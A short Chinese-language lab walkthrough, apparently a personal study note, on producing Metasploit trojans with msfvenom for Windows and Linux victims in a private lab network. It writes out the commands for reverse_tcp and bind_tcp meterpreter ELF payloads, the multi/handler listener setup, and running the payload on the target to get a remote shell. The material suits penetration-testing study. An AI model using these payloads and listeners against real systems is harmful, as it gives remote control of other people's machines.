一、环境
攻击机:kali 192.168.116.128
受害机:win7 192.168.116.124
目标:使用kali
二、复现
windows木马
1)正向
将生成的木马,拖入win7
kali设置监听
在win7中双击木马,上线
2)反向
与正向操作大同小异
区别1:生成木马
这里用以前的截图,懒的敲了
区别2:设置监听
payload最后是reverse_tcp
不用设置rhost,而是设置lhost,即攻击者ip
linux木马
1)反向
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
kali监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxxxx
set lport xxxx
run
目标机运行木马
./shell.elf
2)正向
查看有哪些linux下的载荷:
msfvenom -l payloads | grep linux
和反向连接的区别在于:
反向连接木马是攻击机开放端口,靶机连过来;
正向连接木马是靶机开放端口,攻击机连过去;
生成木马
msfvenom -p linux/x64/meterpreter/bind_tcp lport=4444 -f elf > 11.elf
kali监听,和上面差不多,只是要把reverse_tcp改为bind_tcp,设置受害者ip,不是攻击者ip
目标机运行木马
./11.elf